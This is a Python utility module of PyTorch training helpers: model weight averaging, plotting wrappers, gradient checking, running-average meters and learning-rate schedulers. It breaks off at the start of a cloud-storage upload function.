def ema_update(ema_model: nn.Module, model: nn.Module, gamma: Optional[float] = .999):
if isinstance(model, nn.DataParallel):
model = model.module # Base model.
ema_model_state = ema_model.training
ema_model.eval()
model_state = model.training
model.eval()
ema_state_dict = ema_model.state_dict()
for key, val in model.state_dict().items():
p1 = ema_state_dict[key]
if val.dtype in (torch.int32, torch.int64): # For `num_batches_tracked` in batch norm.
p1.data.copy_(val.detach())
else:
p1.data.copy_(gamma * p1 + (1 - gamma) * val.detach())
ema_model.train(ema_model_state)
model.train(model_state)
def inplace_ema(averaged_module, module, num_averaged, gamma=.99):
del num_averaged
averaged_module_state_dict = averaged_module.state_dict()
for key, val in module.state_dict().items():
p1 = averaged_module_state_dict[key]
if val.dtype in (torch.int32, torch.int64): # For `num_batches_tracked` in batch norm.
p1.data.copy_(val.detach())
else:
p1.data.copy_(gamma * p1.data + (1 - gamma) * val.data)
def inplace_polyak(averaged_module, module, num_averaged):
averaged_module_state_dict = averaged_module.state_dict()
for key, val in module.state_dict().items():
p1 = averaged_module_state_dict[key]
val = val.detach()
if val.dtype in (torch.int32, torch.int64): # For `num_batches_tracked` in batch norm.
p1.data.copy_(val)
else:
p1.data.copy_(p1 + (val - p1) / (num_averaged + 1))
class AveragedModel(nn.Module):
def __init__(self, module: nn.Module, avg_fn=inplace_ema, start_from=0):
super(AveragedModel, self).__init__()
self._module = module
self._averaged_module = copy.deepcopy(module)
self._avg_fn = avg_fn
self._start_from = start_from
self._num_averaged = 1
@torch.no_grad()
def step(self, global_step):
if global_step >= self._start_from:
self._avg_fn(
averaged_module=self._averaged_module,
module=self._module,
num_averaged=self._num_averaged
)
self._num_averaged += 1
else:
self._averaged_module = copy.deepcopy(self._module)
def forward(self, *args, **kwargs):
return self._averaged_module(*args, **kwargs)
def denormalize(x: torch.Tensor, mean: Sequence[float], std: Sequence[float]) -> torch.Tensor:
"""Unnormalize image for `torchvision.utils.save_image`."""
# (bsz, n_channels, nh, hw) -> (n_channels, nh, nw, bsz).
is_single_example = x.dim() == 3
if is_single_example:
x = x[None, ...]
ten = x.clone().permute(1, 2, 3, 0)
for t, m, s in zip(ten, mean, std):
t.mul_(s).add_(m)
# (n_channels, nh, nw, bsz) -> (bsz, n_channels, nh, hw).
out = torch.clamp(ten, 0, 1).permute(3, 0, 1, 2)
if is_single_example:
return out[0]
else:
return out
# Plotting.
def plot_wrapper(*args, suffixes: Optional[Sequence] = None, **kwargs):
"""Allows specifying paths with multiple suffixes."""
img_path = kwargs.pop("img_path", None)
if img_path is None:
return plot(*args, **kwargs) # Directly plot.
else:
if suffixes is None:
return plot(*args, img_path=img_path, **kwargs) # Plot with img_path directly.
else:
# Append suffix to img_path.
for suffix in suffixes:
this_img_path = img_path + suffix
plot(*args, img_path=this_img_path, **kwargs)
def plot(
img_path: Optional[str] = None,
plots: Sequence = (),
steps: Sequence = (),
vlines: Sequence = (),
hlines: Sequence = (),
scatters: Sequence = (),
hists: Sequence = (),
errorbars: Sequence = (),
bars: Sequence = (),
fill_betweens: Sequence = (),
annotates: Sequence = (),
stems: Sequence = (),
options: Optional[Dict] = None,
plots2: Sequence = (),
steps2: Sequence = (),
vlines2: Sequence = (),
hlines2: Sequence = (),
scatters2: Sequence = (),
hists2: Sequence = (),
errorbars2: Sequence = (),
bars2: Sequence = (),
fill_betweens2: Sequence = (),
annotates2=(),
stems2: Sequence = (),
options2: Optional[Dict] = None,
legend_options: Optional[Dict] = None,
disable_legend: Optional[bool] = False,
finalized: bool = True,
dpi: Optional[int] = None,
):
"""A multi-functional plotter to reduce boilerplate.
Good features of this plotter are:
1): Tweaked dpi.
2): Enabled tight_layout.
3): Plot closing.
4): Twin plots.
Args:
img_path (str): A path to the place where the image should be written.
plots (list of dict, optional): A list of curves that needs `plt.plot`.
steps (list of dict, optional): A list of curves that needs `plt.step`.
vlines (list of dict, optional): A list of vertical lines that needs `plt.vline`.
scatters (list of dict, optional): A list of scatter plots that needs `plt.scatter`.
hists (list of histograms, optional): A list of histograms that needs `plt.hist`.
errorbars (list of errorbars, optional): A list of errorbars that needs `plt.errorbar`.
bars (list of dict, optional): A list of bars that needs `plt.bar`.
fill_betweens: (list of dict, optional): A list of shaded regions; kwargs: 'x', 'y1', 'y2'.
options (dict, optional): A dictionary of optional arguments, such as title, xlabel, ylabel, etc.
plots2: Same format as above, but for twin plot.
steps2: Same format as above, but for twin plot.
vlines2: Same format as above, but for twin plot.
scatters2: Same format as above, but for twin plot.
hists2: Same format as above, but for twin plot.
errorbars2: Same format as above, but for twin plot.
bars2: Same format as above, but for twin plot.
fill_betweens2: Same format as above, but for twin plot.
options2: Same format as above, but for twin plot.
legend_options (dict, optional): A dictionary for kwargs passed to `ax.legend` or `plt.legend`.
disable_legend (bool, optional): Remove the legend.
finalized (bool, optional): Show or save the figure if True; otherwise the figure is still modifiable.
Returns:
Nothing.
"""
import matplotlib.pyplot as plt
try:
import seaborn as sns
sns.set_theme(style="darkgrid")
except ModuleNotFoundError:
logging.warning(f"Unable to find `seaborn`, reverting to solely matplotlib.")
if dpi is None:
if img_path is None:
dpi = 100
else:
dpi = 300
fig = plt.figure(dpi=dpi)
ax = fig.add_subplot(111)
if any(len(i) > 0 for i in (plots2, scatters2, hists2, errorbars2, bars2)):
ax2 = ax.twinx()
else:
ax2 = None
_plot(
ax=ax,
plots=plots,
steps=steps,
vlines=vlines,
hlines=hlines,
errorbars=errorbars,
scatters=scatters,
hists=hists,
bars=bars,
fill_betweens=fill_betweens,
options=options,
annotates=annotates,
stems=stems,
)
# Twin-x plot: Share xaxis.
if ax2 is not None:
_plot(
ax=ax2,
plots=plots2,
steps=steps2,
vlines=vlines2,
hlines=hlines2,
scatters=scatters2,
hists=hists2,
errorbars=errorbars2,
bars=bars2,
fill_betweens=fill_betweens2,
options=options2,
annotates=annotates2,
stems=stems2,
)
if legend_options is None:
legend_options = dict(fontsize=13, framealpha=0.6)
legend = ax.legend(**legend_options)
if ax2 is not None:
# Remove first legend then draw again to prevent second plot covering it.
# https://stackoverflow.com/questions/29010078/matplotlib-data-being-plotted-over-legend-when-using-twinx
legend.remove()
ax2.legend(**legend_options)
ax2.add_artist(legend)
if ax2 is None and disable_legend:
legend.remove()
plt.tight_layout()
if finalized:
if img_path is None:
plt.show()
else:
os.makedirs(os.path.dirname(img_path), exist_ok=True)
plt.savefig(img_path)
plt.close()
def _feed_args(options, key, func):
if key in options:
params = options[key]
if type(params) == dict:
func(**params)
elif type(params) in (list, tuple):
func(*params)
else:
func(params)
def _plot(ax, plots, steps, vlines, hlines, errorbars, scatters, hists, bars, fill_betweens, options, annotates, stems):
if options is None:
options = dict()
possible_options = {
'xscale', 'yscale',
'xlabel', 'ylabel',
'xlabel_color', 'ylabel_color',
'title',
'xlim', 'ylim',
'xticks', 'yticks',
'xticklabels', 'yticklabels',
'tick_params'
}
for key in options:
if key not in possible_options:
logging.warning(f"Unknown option fed to `_plot`: {key}")
# Fix default font sizes for xylabels.
if 'xlabel' in options and not isinstance(options['xlabel'], dict):
options['xlabel'] = dict(xlabel=options['xlabel'], fontdict=dict(size=18))
if 'ylabel' in options and not isinstance(options['ylabel'], dict):
options['ylabel'] = dict(ylabel=options['ylabel'], fontdict=dict(size=18))
_feed_args(options, 'xscale', ax.set_xscale)
_feed_args(options, 'yscale', ax.set_yscale)
_feed_args(options, 'xlabel', ax.set_xlabel)
_feed_args(options, 'ylabel', ax.set_ylabel)
_feed_args(options, 'xlabel_color', ax.xaxis.label.set_color)
_feed_args(options, 'ylabel_color', ax.yaxis.label.set_color)
_feed_args(options, 'title', ax.set_title)
_feed_args(options, 'xlim', ax.set_xlim)
_feed_args(options, 'ylim', ax.set_ylim)
_feed_args(options, 'xticks', ax.set_xticks)
_feed_args(options, 'yticks', ax.set_yticks)
_feed_args(options, 'xticklabels', ax.set_xticklabels)
_feed_args(options, 'yticklabels', ax.set_yticklabels)
_feed_args(options, 'tick_params', ax.tick_params)
for entry in plots:
kwargs = {key: entry[key] for key in entry if key != 'x' and key != 'y'}
kwargs.pop('aux', None)
ax.plot(entry['x'], entry['y'], **kwargs)
for entry in steps:
kwargs = {key: entry[key] for key in entry if key != 'x' and key != 'y'}
kwargs.pop('aux', None)
ax.step(entry['x'], entry['y'], **kwargs)
for entry in vlines:
kwargs = {key: entry[key] for key in entry if key not in ('x', 'ymin', 'ymax')}
kwargs.pop('aux', None)
ax.vlines(entry['x'], entry['ymin'], entry['ymax'], **kwargs)
for entry in hlines:
kwargs = {key: entry[key] for key in entry if key not in ('y', 'xmin', 'xmax')}
kwargs.pop('aux', None)
ax.hlines(entry['y'], entry['xmin'], entry['xmax'], **kwargs)
for entry in errorbars:
kwargs = {key: entry[key] for key in entry if key != 'x' and key != 'y'}
kwargs.pop('aux', None)
if "capsize" not in kwargs:
kwargs["capsize"] = 5
ax.errorbar(entry['x'], entry['y'], **kwargs)
for entry in scatters:
kwargs = {key: entry[key] for key in entry if key != 'x' and key != 'y'}
kwargs.pop('aux', None)
ax.scatter(entry['x'], entry['y'], **kwargs)
for entry in hists:
kwargs = {key: entry[key] for key in entry if key != 'x'}
kwargs.pop('aux', None)
ax.hist(entry['x'], **kwargs)
for entry in fill_betweens:
kwargs = {key: entry[key] for key in entry if key not in ('x', 'y1', 'y2')}
kwargs.pop('aux', None)
if 'alpha' not in kwargs:
kwargs['alpha'] = 0.4
ax.fill_between(entry['x'], entry['y1'], entry['y2'], **kwargs)
width = options.get("width", 0.2)
for i, entry in enumerate(bars):
kwargs = {key: entry[key] for key in entry if key != 'x' and key != 'height'}
kwargs.pop('aux', None)
# Each bar has width, the starting position is - (l-1) / 2 * width.
x, height = [np.array(entry[key]) for key in ('x', 'height')]
ax.bar(x - width * (len(bars) - 1) / 2 + width * i, height, width=width, **kwargs)
for entry in annotates:
kwargs = copy.deepcopy(entry)
text, xy = kwargs.pop("text"), kwargs.pop("xy")
ax.annotate(text, xy, **kwargs)
for entry in stems:
kwargs = {key: entry[key] for key in entry if key not in ("locs", "heads")}
ax.stem(entry["locs"], entry["heads"], **kwargs)
return ax
def get_sns_colors(color=None, palette=None):
import seaborn as sns
palette = sns.color_palette(palette=palette)
if color is None:
return palette
else:
if color == 'blue':
return palette[0]
elif color == "orange":
return palette[1]
elif color == "green":
return palette[2]
elif color == "red":
return palette[3]
elif color == "purple":
return palette[4]
elif color == "brown":
return palette[5]
elif color == "pink":
return palette[6]
elif color == "grey":
return palette[7]
elif color == "yellow":
return palette[8]
elif color == "cyan":
return palette[9]
else:
raise ValueError(f"Unknown color: {color}")
def plot_side_by_side(figs1,
figs2,
nrows=8,
ncols=1,
img_path=None,
dpi=300,
title=None,
left_title=None,
right_title=None,
frameon=True,
max_batch_size=64):
"""Plot a dictionary of figures.
Parameters
----------
ncols : number of columns of subplots wanted in the display
nrows : number of rows of subplots wanted in the figure
"""
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
os.makedirs(os.path.dirname(img_path), exist_ok=True)
figs1, figs2 = figs1.squeeze(), figs2.squeeze()
if isinstance(figs1, torch.Tensor):
figs1 = to_numpy(figs1)
if isinstance(figs2, torch.Tensor):
figs2 = to_numpy(figs2)
assert figs1.shape == figs2.shape
figs1, figs2 = figs1[:max_batch_size, ...], figs2[:max_batch_size, ...]
if nrows * ncols < len(figs1):
ncols = (len(figs1) + nrows - 1) // nrows
assert nrows * ncols >= len(figs1)
fig = plt.figure(dpi=dpi, frameon=frameon)
outer = gridspec.GridSpec(1, 2, wspace=0.05, hspace=0.05)
if left_title is not None:
ax = plt.Subplot(fig, outer[0])
ax.set_title(left_title)
ax.axis('off')
fig.add_subplot(ax)
left_block = gridspec.GridSpecFromSubplotSpec(nrows, ncols, subplot_spec=outer[0], wspace=0.0, hspace=0.0)
for ind, item in enumerate(figs1):
ax = plt.Subplot(fig, left_block[ind])
ax.set_axis_off()
ax.set_aspect('auto')
if isinstance(figs1, dict):
# `item` is the key.
img = figs1[item]
cmap = plt.gray() if len(img.shape) == 2 else None
ax.imshow(img, cmap=cmap)
ax.set_title(item)
else:
# `item` is the image.
cmap = plt.gray() if len(item.shape) == 2 else None
item = item.transpose(1, 2, 0) if item.shape[0] in (1, 3) else item
ax.imshow(item, cmap=cmap)
fig.add_subplot(ax)
if right_title is not None:
ax = plt.Subplot(fig, outer[1])
ax.set_title(right_title)
ax.axis('off')
fig.add_subplot(ax)
right_block = gridspec.GridSpecFromSubplotSpec(nrows, ncols, subplot_spec=outer[1], wspace=0.0, hspace=0.0)
for ind, item in enumerate(figs2):
ax = plt.Subplot(fig, right_block[ind])
ax.set_axis_off()
ax.set_aspect('auto')
if isinstance(figs2, dict):
# `item` is the key.
img = figs2[item]
cmap = plt.gray() if len(img.shape) == 2 else None
ax.imshow(img, cmap=cmap)
ax.set_title(item)
else:
# `item` is the image.
cmap = plt.gray() if len(item.shape) == 2 else None
item = item.transpose(1, 2, 0) if item.shape[0] in (1, 3) else item
ax.imshow(item, cmap=cmap)
fig.add_subplot(ax)
fig.suptitle(title)
plt.savefig(img_path, bbox_inches='tight')
plt.clf()
plt.close()
# Shameless copy from https://matplotlib.org/3.5.0/gallery/images_contours_and_fields/image_annotated_heatmap.html
# TODO: These utils are inconvenient; need to modify in the future.
# Also, kwargs should not have dict as default value. Terrible style!
def heatmap(data, row_labels, col_labels, ax=None,
cbar_kw={}, cbarlabel="", **kwargs):
"""
Create a heatmap from a numpy array and two lists of labels.
Parameters
----------
data
A 2D numpy array of shape (M, N).
row_labels
A list or array of length M with the labels for the rows.
col_labels
A list or array of length N with the labels for the columns.
ax
A `matplotlib.axes.Axes` instance to which the heatmap is plotted. If
not provided, use current axes or create a new one. Optional.
cbar_kw
A dictionary with arguments to `matplotlib.Figure.colorbar`. Optional.
cbarlabel
The label for the colorbar. Optional.
**kwargs
All other arguments are forwarded to `imshow`.
"""
import matplotlib.pyplot as plt
if not ax:
ax = plt.gca()
# Plot the heatmap
im = ax.imshow(data, **kwargs)
# Create colorbar
cbar = ax.figure.colorbar(im, ax=ax, **cbar_kw)
cbar.ax.set_ylabel(cbarlabel, rotation=-90, va="bottom")
# Show all ticks and label them with the respective list entries.
ax.set_xticks(np.arange(data.shape[1]), labels=col_labels)
ax.set_yticks(np.arange(data.shape[0]), labels=row_labels)
# Let the horizontal axes labeling appear on top.
ax.tick_params(top=True, bottom=False,
labeltop=True, labelbottom=False)
# Rotate the tick labels and set their alignment.
plt.setp(ax.get_xticklabels(), rotation=-30, ha="right",
rotation_mode="anchor")
# Turn spines off and create white grid.
ax.spines[:].set_visible(False)
ax.set_xticks(np.arange(data.shape[1] + 1) - .5, minor=True)
ax.set_yticks(np.arange(data.shape[0] + 1) - .5, minor=True)
ax.grid(which="minor", color="w", linestyle='-', linewidth=3)
ax.tick_params(which="minor", bottom=False, left=False)
return im, cbar
def annotate_heatmap(im, data=None, **textkw):
"""
A function to annotate a heatmap.
Parameters
----------
im
The AxesImage to be labeled.
data
Data used to annotate. If None, the image's data is used. Optional.
valfmt
The format of the annotations inside the heatmap. This should either
use the string format method, e.g. "$ {x:.2f}", or be a
`matplotlib.ticker.Formatter`. Optional.
**kwargs
All other arguments are forwarded to each call to `text` used to create
the text labels.
"""
if not isinstance(data, (list, np.ndarray)):
data = im.get_array()
# Set default alignment to center, but allow it to be
# overwritten by textkw.
kw = dict(horizontalalignment="center",
verticalalignment="center")
kw.update(textkw)
# Loop over the data and create a `Text` for each "pixel".
# Change the text's color depending on the data.
texts = []
for i in range(len(data)):
for j in range(len(data[0])):
text = im.axes.text(j, i, data[i][j], **kw)
texts.append(text)
return texts
# Shameless copy from plottools https://pythonhosted.org/plottools/generated/plottools.zoom_axes.html
def zoom_axes(fig, ax, zoom_x, zoom_y, axes_x, axes_y, box=True, box_color='k', box_alpha=0.8, connect=True,
connect_color='k', connect_alpha=0.3, spacing=4, tick_width=20, tick_height=12):
"""
Creates a new axes which zooms in on a part of a given axes.
A box is drawn around the area to be zoomed specified in data coordinates. A
new empty axes is created at the specified location, supplied in data
coordinates. The new axis limits are set so that they match the zoom box.
The zoom box and axis can be connected with two lines, connecting the outer
most corner points while leaving space for the axis ticks.
Parameters
----------
fig : matplotlib figure
the figure in which to create a zoom axis
ax : matplotlib axes
the axis in which to create a zoom axis
zoom_x : list
[min, max] specifying the zooming horizontal area in data
coordinates
zoom_y : list
[min, max] specifying the zooming vertical area in data coordinates
axes_x : list
[min, max] specifying the new axes horizontal location in data
coordinates
axes_y : list
[min, max] specifying the new axes vertical location in data
coordinates
box : bool, optional
specifies whether a box is drawn
box_color : color string or tuple,optional
specifies the box color
box_alpha : number
between 0 and 1, specifies the box alpha
connect : bool, optional
specifies whether the connecting lines are drawn
connect_color : color string or tuple,optional
specifies the connecting lines color
connect_alpha : number
between 0 and 1, specifies the connecting lines alpha
spacing : number
specifies the spacing between the box, axis and the connecting lines
in points
tick_width : number
specifies the width of the tick labels in points to avoid drawing
connecting lines through the tick labels
tick_height : number
specifies the height of the tick labels in points to avoid drawing
connecting lines through the tick labels
Returns
-------
ax_zoom : matplotlib axes
the new axes
Notes
-----
* Axes limits should not be changed after a zoom axes has been added
* :code:`zoom_axes` does not give the expected results when used on a
subfigure
Examples
--------
.. plot::
>>> import matplotlib.pyplot as plt
>>> import numpy as np
>>> import plottools
>>>
>>> fig,ax = plt.subplots()
>>> x = np.linspace(0,1,100)
>>> y = 1-x + 0.02*(2*np.random.random(len(x))-1)
>>> ax.plot(x,y)
>>> ax_zoom = plottools.zoom_axes(fig,ax,[0.1,0.2],[0.8,0.9],[0.6,0.9],[0.6,0.9])
>>> ax_zoom.plot(x,y)
>>> plt.show()
"""
import matplotlib.pyplot as plt
plt.tight_layout()
ax1_p0 = (ax.transData + fig.transFigure.inverted()).transform_point((axes_x[0], axes_y[0]))
ax1_p1 = (ax.transData + fig.transFigure.inverted()).transform_point((axes_x[1], axes_y[1]))
ax1 = plt.axes([ax1_p0[0], ax1_p0[1], ax1_p1[0] - ax1_p0[0], ax1_p1[1] - ax1_p0[1]])
ax1.set_xlim(zoom_x)
ax1.set_ylim(zoom_y)
plt.xticks(fontsize=4)
plt.yticks(fontsize=4)
ax1.tick_params(axis='x', pad=3)
ax1.tick_params(axis='y', pad=2)
if box:
ax.plot([zoom_x[0], zoom_x[1], zoom_x[1], zoom_x[0], zoom_x[0]],
[zoom_y[0], zoom_y[0], zoom_y[1], zoom_y[1], zoom_y[0]], color=box_color, alpha=box_alpha,
linewidth=0.4)
if connect:
# define a box of points of the axes and the zoom
zoom_xx = [zoom_x[0], zoom_x[0], zoom_x[1], zoom_x[1]]
zoom_yy = [zoom_y[0], zoom_y[1], zoom_y[1], zoom_y[0]]
axes_xx = [axes_x[0], axes_x[0], axes_x[1], axes_x[1]]
axes_yy = [axes_y[0], axes_y[1], axes_y[1], axes_y[0]]
# determine which points to connect
if axes_x[1] < zoom_x[1]:
# left
if axes_y[0] > zoom_y[0]:
# top
p1 = 0
p2 = 2
elif axes_y[1] < zoom_y[1]:
# bottom
p1 = 1
p2 = 3
else:
# center
p1 = 2
p2 = 3
elif axes_x[0] > zoom_x[0]:
# right
if axes_y[0] > zoom_y[0]:
# top
p1 = 1
p2 = 3
elif axes_y[1] < zoom_y[1]:
# bottom
p1 = 0
p2 = 2
else:
# center
p1 = 0
p2 = 1
else:
# center
if axes_y[0] > zoom_y[0]:
# top
p1 = 0
p2 = 3
elif axes_y[1] < zoom_y[1]:
# bottom
p1 = 1
p2 = 2
else:
# center, the axes is over the zoom
p1 = 0
p2 = 0
line1 = ([zoom_xx[p1], axes_xx[p1]], [zoom_yy[p1], axes_yy[p1]])
line2 = ([zoom_xx[p2], axes_xx[p2]], [zoom_yy[p2], axes_yy[p2]])
# estimate the width and height of the ticks
tick_width = (ax.transData.inverted()).transform_point((tick_width, 0))[0] - \
(ax.transData.inverted()).transform_point((0, 0))[0]
tick_height = (ax.transData.inverted()).transform_point((0, tick_height))[1] - \
(ax.transData.inverted()).transform_point((0, 0))[1]
spacing = (ax.transData.inverted()).transform_point((spacing, 0))[0] - \
(ax.transData.inverted()).transform_point((0, 0))[0]
# create fictional boxes around the axes where no lines should be
box_axes_x = [axes_x[0] - tick_width, axes_x[1] + spacing]
box_axes_y = [axes_y[0] - tick_height, axes_y[1] + spacing]
box_zoom_x = [zoom_x[0] - spacing, zoom_x[1] + spacing]
box_zoom_y = [zoom_y[0] - spacing, zoom_y[1] + spacing]
# cut the lines inside the boxes
t = np.linspace(0, 1, 100)
line1_cut = line1
line2_cut = line2
for tt in t:
x = line1[0][0] * (1 - tt) + line1[0][1] * tt
y = line1[1][0] * (1 - tt) + line1[1][1] * tt
if x <= box_zoom_x[0] or x >= box_zoom_x[1] or y <= box_zoom_y[0] or y >= box_zoom_y[1]:
line1_cut[0][0] = x
line1_cut[1][0] = y
break
for tt in t[::-1]:
x = line1[0][0] * (1 - tt) + line1[0][1] * tt
y = line1[1][0] * (1 - tt) + line1[1][1] * tt
if (x <= box_axes_x[0] or x >= box_axes_x[1]) or (y <= box_axes_y[0] or y >= box_axes_y[1]):
line1_cut[0][1] = x
line1_cut[1][1] = y
break
for tt in t:
x = line2[0][0] * (1 - tt) + line2[0][1] * tt
y = line2[1][0] * (1 - tt) + line2[1][1] * tt
if (x <= box_zoom_x[0] or x >= box_zoom_x[1]) or (y <= box_zoom_y[0] or y >= box_zoom_y[1]):
line2_cut[0][0] = x
line2_cut[1][0] = y
break
for tt in t[::-1]:
x = line2[0][0] * (1 - tt) + line2[0][1] * tt
y = line2[1][0] * (1 - tt) + line2[1][1] * tt
if (x <= box_axes_x[0] or x >= box_axes_x[1]) or (y <= box_axes_y[0] or y >= box_axes_y[1]):
line2_cut[0][1] = x
line2_cut[1][1] = y
break
# draw the connecting lines
ax.plot(line1_cut[0], line1_cut[1], color=connect_color, alpha=connect_alpha, linewidth=0.4)
ax.plot(line2_cut[0], line2_cut[1], color=connect_color, alpha=connect_alpha, linewidth=0.4)
return ax1
def make_mp4(img_paths: Sequence[str], out_path: str, fps: int):
"""Make an mp4 video from a list of images with paths specified."""
import cv2 # Don't import unless absolutely necessary!
if not out_path.endswith(".mp4"): raise ValueError(f"`out_path` must specify path to .mp4 file type")
frame = cv2.imread(img_paths[0])
cv2.imshow('video', frame)
height, width, channels = frame.shape
fourcc = cv2.VideoWriter_fourcc(*'mp4v')
out = cv2.VideoWriter(out_path, fourcc, fps, (width, height))
for img_path in img_paths:
frame = cv2.imread(img_path)
out.write(frame)
cv2.imshow('video', frame)
if (cv2.waitKey(1) & 0xFF) == ord('q'): # Hit `q` to exit
break
out.release()
cv2.destroyAllWindows()
# Gradient checking.
def gradcheck(func: Callable,
inputs: Union[torch.Tensor, Sequence[torch.Tensor]],
modules: Optional[Union[nn.Module, Sequence[nn.Module]]] = (),
eps: float = 1e-6,
atol: float = 1e-5,
rtol: float = 1e-3,
grad_inputs=False,
gradgrad_inputs=False,
grad_params=False,
gradgrad_params=False):
"""Check grad and grad of grad wrt inputs and parameters of Modules.
When `func` is vector-valued, the checks compare autodiff vjp against
finite-difference vjp, where v is a sampled standard normal vector.
This function is aimed to be as self-contained as possible so that it could
be copied/pasted across different projects.
Args:
func (callable): A Python function that takes in a sequence of tensors
(inputs) and a sequence of nn.Module (modules), and outputs a tensor
or a sequence of tensors.
inputs (sequence of Tensors): The input tensors.
modules (sequence of nn.Module): The modules whose parameter gradient
needs to be tested.
eps (float, optional): Magnitude of two-sided finite difference
perturbation.
atol (float, optional): Absolute tolerance.
rtol (float, optional): Relative tolerance.
grad_inputs (bool, optional): Check gradients wrt inputs if True.
gradgrad_inputs (bool, optional): Check gradients of gradients wrt
inputs if True.
grad_params (bool, optional): Check gradients wrt differentiable
parameters of modules if True.
gradgrad_params (bool, optional): Check gradients of gradients wrt
differentiable parameters of modules if True.
Returns:
None.
"""
if isinstance(inputs, torch.Tensor):
inputs = (inputs,)
if isinstance(modules, nn.Module):
modules = (modules,)
# Don't modify original objects.
modules = tuple(copy.deepcopy(m) for m in modules)
inputs = tuple(i.clone().requires_grad_() for i in inputs)
func = _make_scalar_valued_func(func, inputs, modules)
func_only_inputs = lambda *args: func(args, modules) # noqa
# Grad wrt inputs.
if grad_inputs:
torch.autograd.gradcheck(func_only_inputs, inputs, eps=eps, atol=atol, rtol=rtol)
# Grad of grad wrt inputs.
if gradgrad_inputs:
torch.autograd.gradgradcheck(func_only_inputs, inputs, eps=eps, atol=atol, rtol=rtol)
# Grad wrt params.
if grad_params:
params = [p for m in modules for p in m.parameters() if p.requires_grad]
loss = func(inputs, modules)
framework_grad = flatten(convert_none_to_zeros(torch.autograd.grad(loss, params, create_graph=True), params))
numerical_grad = []
for param in params:
flat_param = param.reshape(-1)
for i in range(len(flat_param)):
flat_param[i] += eps # In-place.
plus_eps = func(inputs, modules).detach()
flat_param[i] -= eps
flat_param[i] -= eps
minus_eps = func(inputs, modules).detach()
flat_param[i] += eps
numerical_grad.append((plus_eps - minus_eps) / (2 * eps))
del plus_eps, minus_eps
numerical_grad = torch.stack(numerical_grad)
torch.testing.assert_allclose(numerical_grad, framework_grad, rtol=rtol, atol=atol)
# Grad of grad wrt params.
if gradgrad_params:
def func_high_order(inputs_, modules_):
params_ = [p for m in modules for p in m.parameters() if p.requires_grad]
grads = torch.autograd.grad(func(inputs_, modules_), params_, create_graph=True, allow_unused=True)
return tuple(grad for grad in grads if grad is not None)
gradcheck(func_high_order, inputs, modules, rtol=rtol, atol=atol, eps=eps, grad_params=True)
def _make_scalar_valued_func(func, inputs, modules):
outputs = func(inputs, modules)
output_size = outputs.numel() if torch.is_tensor(outputs) else sum(o.numel() for o in outputs)
if output_size > 1:
# Define this outside `func_scalar_valued` so that random tensors are generated only once.
grad_outputs = tuple(torch.randn_like(o) for o in outputs)
def func_scalar_valued(inputs_, modules_):
outputs_ = func(inputs_, modules_)
return sum((output * grad_output).sum() for output, grad_output, in zip(outputs_, grad_outputs))
return func_scalar_valued
return func
# Meters.
class Meter(abc.ABC):
def __init__(self, init_val: Optional[float] = None, store_history=False):
self._val = init_val
self._his = []
self._store_history = store_history
@abc.abstractmethod
def step(self, x: Union[torch.Tensor, np.ndarray, float]):
x = to_numpy(x)
if self._store_history:
self._his.append(x)
return x
def item(self) -> float:
return self._val
class EMAMeter(Meter):
"""Standard exponential moving average."""
def __init__(self, gamma: Optional[float] = .99):
super(EMAMeter, self).__init__()
self._gamma = gamma
def step(self, x: Union[torch.Tensor, np.ndarray, float]):
x = super(EMAMeter, self).step(x)
if self._val is None:
self._val = x
else:
self._val = self._gamma * self._val + (1 - self._gamma) * x
return self._val
class AvgMeter(Meter):
"""Exact online averaging."""
def __init__(self):
super(AvgMeter, self).__init__()
self._count = 0
def step(self, x: Union[torch.Tensor, np.ndarray, float]):
x = super(AvgMeter, self).step(x)
if self._val is None:
self._val = x
else:
self._val = self._val * self._count / (self._count + 1) + x / (self._count + 1)
self._count += 1
return self._val
class SumMeter(Meter):
def __init__(self):
super(SumMeter, self).__init__()
def step(self, x: Union[torch.Tensor, np.ndarray, float]):
x = super(SumMeter, self).step(x)
if self._val is None:
self._val = x
else:
self._val = self._val + x
return self._val
class MaxMeter(Meter):
def __init__(self):
super(MaxMeter, self).__init__()
def step(self, x: Union[torch.Tensor, np.ndarray, float]):
x = super(MaxMeter, self).step(x)
if self._val is None:
self._val = x
elif x > self._val:
self._val = x
return self._val
class MinMeter(Meter):
def __init__(self):
super(MinMeter, self).__init__()
def step(self, x: Union[torch.Tensor, np.ndarray, float]):
x = super(MinMeter, self).step(x)
if self._val is None:
self._val = x
elif x < self._val:
self._val = x
return self._val
# Custom learning rate schedules.
def get_warmup_exp_decay_scheduler(optimizer: optim.Optimizer,
num_warmup_steps: int,
lr_decay_rate: Optional[float] = .99997,
last_epoch: Optional[int] = -1):
"""Exponential decay schedule with linear warmup."""
def _lr_lambda(current_step):
if current_step < num_warmup_steps:
return float(current_step) / float(max(1, num_warmup_steps))
return lr_decay_rate ** (current_step - num_warmup_steps)
return optim.lr_scheduler.LambdaLR(optimizer, _lr_lambda, last_epoch=last_epoch)
def get_warmup_inverse_sqrt_scheduler(optimizer: optim.Optimizer,
d_model: int,
num_warmup_steps: Optional[int] = 4000,
last_epoch: Optional[int] = -1,
factor: Optional[float] = 1.):
"""Inverse square root with linear warmup exactly as in transformers paper.
Args:
optimizer: Optimizer of choice.
d_model: Size of transformer encoding.
num_warmup_steps: Number of steps for linear warmup.
last_epoch: Typical argument for lambda schedules.
factor (float): A scalar factor applied to the default schedule. Defaults to 1., which is the original.
Returns:
A LambdaLR with corresponding schedule.
"""
# Since LambdaLR multiplies the return value of the lambda_lr function with the lr,
# we set lr to be 1.
for param_group in optimizer.param_groups:
if 'lr' in param_group:
param_group['lr'] = 1
num_warmup_steps = max(num_warmup_steps, 1) # To prevent raising zero to a negative power.
def _lr_lambda(current_step):
current_step += 1 # To prevent raising zero to a negative power.
return d_model ** -0.5 * min(current_step ** -0.5, current_step * num_warmup_steps ** -1.5) * factor
return optim.lr_scheduler.LambdaLR(optimizer, _lr_lambda, last_epoch=last_epoch)
def get_linear_lr_scheduler(optimizer: optim.Optimizer,
start_lr: float,
end_lr: float,
num_steps: int,
last_epoch: Optional[int] = -1):
"""Simple linear scheduler from start_lr to end_lr.
Becomes constant when current_step is larger than num_steps.
"""
def _lr_lambda(current_step):
return start_lr + (end_lr - start_lr) * (min(current_step, num_steps) / num_steps)
return optim.lr_scheduler.LambdaLR(optimizer, _lr_lambda, last_epoch=last_epoch)
def get_lr(optimizer: optim.Optimizer):
return optimizer.param_groups[0]['lr']
# Google cloud storage.
def gs_upload_from_path(local_path, remote_path=None, remove_local=True, timeout=480):
"""Uploads a single file to a remote gs bucket.
